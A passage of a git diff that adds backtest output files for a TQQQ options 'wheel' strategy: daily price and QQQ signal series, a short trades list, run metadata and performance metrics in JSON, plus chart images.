], + [ + "2025-06-04", + 36.67856216430664 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.72623825073242 + ], + [ + "2025-06-11", + 37.33893966674805 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685607910156 + ], + [ + "2025-06-17", + 36.524635314941406 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.09067153930664 + ], + [ + "2025-06-24", + 38.778873443603516 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276607513427734 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.34215545654297 + ], + [ + "2025-07-09", + 42.19857406616211 + ], + [ + "2025-07-10", + 42.004390716552734 + ], + [ + "2025-07-11", + 41.68572235107422 + ], + [ + "2025-07-14", + 42.12887191772461 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.343788146972656 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.851661682128906 + ], + [ + "2025-07-22", + 43.169517517089844 + ], + [ + "2025-07-23", + 43.737144470214844 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23506164550781 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252868652344 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43586349487305 + ], + [ + "2025-08-18", + 46.37611389160156 + ], + [ + "2025-08-19", + 44.48401641845703 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.608497619628906 + ], + [ + "2025-08-26", + 45.1263313293457 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702819824219 + ], + [ + "2025-08-29", + 44.49397659301758 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.371131896972656 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.96030807495117 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.142005920410156 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.261627197265625 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.18187713623047 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.485904693603516 + ], + [ + "2025-10-08", + 54.265167236328125 + ], + [ + "2025-10-09", + 54.05085754394531 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.40261459350586 + ], + [ + "2025-10-15", + 51.434288024902344 + ], + [ + "2025-10-16", + 50.861141204833984 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.71194839477539 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.102474212646484 + ], + [ + "2025-10-27", + 58.02804946899414 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.361637115478516 + ], + [ + "2025-11-05", + 56.43817138671875 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.861141204833984 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30082702636719 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596221923828 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.198604583740234 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87642288208008 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.331729888916016 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080383300781 + ], + [ + "2025-12-09", + 55.83012771606445 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037155151367 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.833335876464844 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2025-04-24", + 465.09869384765625 + ], + [ + "2025-04-25", + 470.2835998535156 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.2393493652344 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752502441406 + ], + [ + "2025-05-05", + 483.5892028808594 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.9718933105469 + ], + [ + "2025-05-08", + 485.9378662109375 + ], + [ + "2025-05-09", + 485.619384765625 + ], + [ + "2025-05-12", + 505.4036560058594 + ], + [ + "2025-05-13", + 513.1064453125 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7486572265625 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954833984375 + ], + [ + "2025-05-20", + 517.7637329101562 + ], + [ + "2025-05-21", + 510.568603515625 + ], + [ + "2025-05-22", + 511.5240478515625 + ], + [ + "2025-05-23", + 506.7868957519531 + ], + [ + "2025-05-27", + 518.7091674804688 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254760742188 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.6896362304688 + ], + [ + "2025-06-03", + 524.7599487304688 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3673095703125 + ], + [ + "2025-06-09", + 528.1435546875 + ], + [ + "2025-06-10", + 531.6366577148438 + ], + [ + "2025-06-11", + 529.84521484375 + ], + [ + "2025-06-12", + 531.0892333984375 + ], + [ + "2025-06-13", + 524.421630859375 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.7831420898438 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.19921875 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.98779296875 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.192138671875 + ], + [ + "2025-07-10", + 553.3951416015625 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.15234375 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283935546875 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7241821289062 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747802734375 + ], + [ + "2025-07-28", + 566.0382080078125 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309326171875 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2213134765625 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.193115234375 + ], + [ + "2025-08-14", + 577.7446899414062 + ], + [ + "2025-08-15", + 575.2042236328125 + ], + [ + "2025-08-18", + 574.9750366210938 + ], + [ + "2025-08-19", + 567.1739501953125 + ], + [ + "2025-08-20", + 563.8064575195312 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.210205078125 + ], + [ + "2025-08-26", + 570.4915771484375 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.5275268554688 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624267578125 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.9192504882812 + ], + [ + "2025-09-12", + 584.4896850585938 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.992919921875 + ], + [ + "2025-09-17", + 587.8173828125 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1327514648438 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.8842163085938 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4784545898438 + ], + [ + "2025-10-15", + 600.6876831054688 + ], + [ + "2025-10-16", + 598.46337890625 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.9839477539062 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4694213867188 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.67431640625 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.7926635742188 + ], + [ + "2025-11-19", + 598.3436279296875 + ], + [ + "2025-11-20", + 584.1797485351562 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3407592773438 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.67431640625 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4172973632812 + ], + [ + "2025-12-03", + 621.9334716796875 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915283203125 + ], + [ + "2025-12-09", + 623.4595336914062 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0586547851562 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601196289062 + ], + [ + "2025-12-19", + 615.47998046875 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ] +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/trades.json b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/trades.json new file mode 100644 index 0000000..61cf0e0 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/trades.json @@ -0,0 +1,38 @@ +[ + { + "date": "2025-11-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.65, + "spot": 53.198604583740234, + "premium": 2.066391470619516, + "close_cost": 0.9709011820930149, + "pnl": 103.56902885265012, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2026-02-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.85, + "spot": 49.97737121582031, + "premium": 1.264905721711207, + "close_cost": 0.5412533437233309, + "pnl": 66.3852377987876, + "hold_days": 15, + "result": "Win" + }, + { + "date": "2026-04-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.13, + "spot": 44.099998474121094, + "premium": 1.4551086033202925, + "close_cost": 0.6441042182790238, + "pnl": 75.12043850412687, + "hold_days": 10, + "result": "Win" + } +] \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/drawdown.png b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/drawdown.png new file mode 100644 index 0000000..de0a3c2 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/drawdown.png differ diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/equity.png b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/equity.png new file mode 100644 index 0000000..9f0194a Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/equity.png differ diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/indicators.png b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/indicators.png new file mode 100644 index 0000000..31c6fde Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/indicators.png differ diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/monthly.png b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/monthly.png new file mode 100644 index 0000000..92b8a07 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/monthly.png differ diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/meta.json b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/meta.json new file mode 100644 index 0000000..8bd91a8 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/meta.json @@ -0,0 +1,13 @@ +{ + "start": "2021-04-24", + "end": "2026-04-24", + "style": "aggressive", + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "put_otm_pct": 6.0, + "call_otm_pct": 2.0, + "put_tp_pct": 80.0, + "call_tp_pct": 80.0, + "put_sl_pct": null, + "call_sl_pct": null +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/metrics.json b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/metrics.json new file mode 100644 index 0000000..5b980f0 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/metrics.json @@ -0,0 +1,15 @@ +{ + "total_return": 22.733742227955787, + "final_value": 12273.374222795579, + "cagr": 4.189634814548815, + "sharpe": 0.1856543053754313, + "max_dd": -12.24209072332098, + "n_trades": 172, + "wins": 134, + "losses": 38, + "win_rate": 77.90697674418605, + "avg_win": 47.0994160151811, + "avg_loss": -164.8441877629063, + "chain_quotes": 0, + "bs_quotes": 771 +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/series.json b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/series.json new file mode 100644 index 0000000..e02da75 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/series.json @@ -0,0 +1,30376 @@ +{ + "equity": [ + [ + "2021-04-26", + 9998.183037138344 + ], + [ + "2021-04-27", + 9996.393186993242 + ], + [ + "2021-04-28", + 9996.650937178054 + ], + [ + "2021-04-29", + 10012.278935972987 + ], + [ + "2021-04-30", + 10008.43146239501 + ], + [ + "2021-05-03", + 10036.722157132908 + ], + [ + "2021-05-04", + 9999.264688361793 + ], + [ + "2021-05-05", + 9994.517558816418 + ], + [ + "2021-05-06", + 10026.858280806013 + ], + [ + "2021-05-07", + 10055.166084435452 + ], + [ + "2021-05-10", + 9991.841949793747 + ], + [ + "2021-05-11", + 9992.657688035744 + ], + [ + "2021-05-12", + 9862.47022703544 + ], + [ + "2021-05-13", + 9892.52975168982 + ], + [ + "2021-05-14", + 9946.349181662332 + ], + [ + "2021-05-17", + 9958.800876460044 + ], + [ + "2021-05-18", + 9959.854217688324 + ], + [ + "2021-05-19", + 9969.005453660298 + ], + [ + "2021-05-20", + 9994.024353653918 + ], + [ + "2021-05-21", + 9994.610064105622 + ], + [ + "2021-05-24", + 10001.788277219279 + ], + [ + "2021-05-25", + 10002.961524129183 + ], + [ + "2021-05-26", + 10001.144908665305 + ], + [ + "2021-05-27", + 10000.657042124398 + ], + [ + "2021-05-28", + 10013.614243479922 + ], + [ + "2021-06-01", + 10034.241955409518 + ], + [ + "2021-06-02", + 10035.4190092564 + ], + [ + "2021-06-03", + 10033.606201176071 + ], + [ + "2021-06-04", + 10056.05440954965 + ], + [ + "2021-06-07", + 10063.12948679704 + ], + [ + "2021-06-08", + 10064.309929258638 + ], + [ + "2021-06-09", + 10065.49051019052 + ], + [ + "2021-06-10", + 10066.671229608932 + ], + [ + "2021-06-11", + 10067.852087530115 + ], + [ + "2021-06-14", + 10069.033083970318 + ], + [ + "2021-06-15", + 10070.21421894579 + ], + [ + "2021-06-16", + 10071.39549247278 + ], + [ + "2021-06-17", + 10072.576904567542 + ], + [ + "2021-06-18", + 10073.75845524633 + ], + [ + "2021-06-21", + 10074.940144525403 + ], + [ + "2021-06-22", + 10076.121972421015 + ], + [ + 